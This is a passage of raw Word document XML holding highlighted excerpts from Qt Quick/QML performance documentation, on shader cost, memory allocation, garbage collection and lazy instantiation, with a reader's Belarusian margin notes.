          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type makes it possible to place </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GLSL code inline in a Qt Quick application</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with very little overhead. </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However, it is important to realize that the fragment program needs to run for every pixel in the rendered shape</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. When deploying to low-end hardware and the shader is covering a large amount of pixels, one should keep the fragment shader to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>few instructions to avoid poor performance</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shaders written in GLSL allow for complex transformations and visual effects to be written</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, however they should be used with care. Using a</w:t>
      </w:r>
      <w:r w:rsidR="00CB35CC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId667" w:history="1">
        <w:r w:rsidRPr="00976E5D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ShaderEffectSource</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CB35CC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">causes a scene to be prerendered into an </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FBO</w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> before it can be drawn. This extra overhead can be quite expensive</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00CB35CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1032" w:name="memory-allocation-and-collection"/>
      <w:bookmarkStart w:id="1033" w:name="_Toc483000748"/>
      <w:bookmarkStart w:id="1034" w:name="_Toc483003758"/>
      <w:bookmarkStart w:id="1035" w:name="_Toc483604100"/>
      <w:bookmarkStart w:id="1036" w:name="_Toc483605320"/>
      <w:bookmarkEnd w:id="1032"/>
      <w:r w:rsidRPr="00CB35CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Memory Allocation And Collection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1033"/>
      <w:bookmarkEnd w:id="1034"/>
      <w:bookmarkEnd w:id="1035"/>
      <w:bookmarkEnd w:id="1036"/>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976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The amount of memory which will be allocated by an application and the way in which that memory will be allocated are very important considerations</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CB35CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB35CC" w:rsidRPr="00CB35CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00976E5D" w:rsidRPr="00CB35CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>важныя аспекты праграм увогуле</w:t>
      </w:r>
      <w:r w:rsidR="00CB35CC" w:rsidRPr="00CB35CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00CB35CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aside from the obvious concerns about </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>out-of-memory conditions on memory-constrained devices</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allocating memory on the heap is a fairly computationally expensive operation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>certain allocation strategies can result in increased fragmentation of data across pages</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScript uses a managed memory </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>heap which is automatically garbage collected, and this provides some advantages but also has some important implications</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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An application written in </w:t>
      </w:r>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML uses me</w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mory</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from both the </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C++ heap</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and an </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>automatically managed JavaScript heap</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The application developer needs to be aware of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subtleties of each</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to maximise performance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00215AFC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1037" w:name="tips-for-qml-application-developers"/>
      <w:bookmarkStart w:id="1038" w:name="_Toc483000749"/>
      <w:bookmarkStart w:id="1039" w:name="_Toc483003759"/>
      <w:bookmarkStart w:id="1040" w:name="_Toc483604101"/>
      <w:bookmarkStart w:id="1041" w:name="_Toc483605321"/>
      <w:bookmarkEnd w:id="1037"/>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tips For QML Application Developers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1038"/>
      <w:bookmarkEnd w:id="1039"/>
      <w:bookmarkEnd w:id="1040"/>
      <w:bookmarkEnd w:id="1041"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00215AFC" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The tips and suggestions contained in this section are </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>guidelines only, and may not be applicable in all circumstances</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Be sure to benchmark and analyze your application carefully</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using empirical metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, in order to make the best decisions possible.</w:t>
      </w:r>
      <w:r w:rsidR="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00215AFC" w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00976E5D" w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>эмпірызм у праектаванні праграмных сістэм</w:t>
      </w:r>
      <w:r w:rsidR="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">. Яго прычыны ляжаць у самой сутнасці праграмных сістэма. Глядзі Брукса </w:t>
      </w:r>
      <w:r w:rsidR="00215AFC" w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00215AFC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1042" w:name="instantiate-and-initialize-components-la"/>
      <w:bookmarkStart w:id="1043" w:name="_Toc483000750"/>
      <w:bookmarkStart w:id="1044" w:name="_Toc483604102"/>
      <w:bookmarkStart w:id="1045" w:name="_Toc483605322"/>
      <w:bookmarkEnd w:id="1042"/>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Instantiate and initialize components lazily</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1043"/>
      <w:bookmarkEnd w:id="1044"/>
      <w:bookmarkEnd w:id="1045"/>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If your application </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>consists of multiple views</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for example, multiple tabs) but </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only one is required at any one time</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use lazy instantiation</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to minimize the amount of memory you need to have allocated at any given time. See the prior section on</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId668" w:anchor="lazy-initialization" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Lazy Initialization</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00215AFC">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1046" w:name="destroy-unused-objects"/>
      <w:bookmarkStart w:id="1047" w:name="_Toc483000751"/>
      <w:bookmarkStart w:id="1048" w:name="_Toc483604103"/>
      <w:bookmarkStart w:id="1049" w:name="_Toc483605323"/>
      <w:bookmarkEnd w:id="1046"/>
      <w:r w:rsidRPr="00215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Destroy unused objects</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1047"/>
      <w:bookmarkEnd w:id="1048"/>
      <w:bookmarkEnd w:id="1049"/>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215AFC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you lazily instantiate components, or dynamically create objects during a JavaScript expression</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it is often better to manually</w:t>
      </w:r>
      <w:r w:rsidR="00215AFC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>destroy()</w:t>
      </w:r>
      <w:r w:rsidR="00215AFC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00976E5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>them rather than waiting for automatic garbage collection to do so</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the prior section on</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
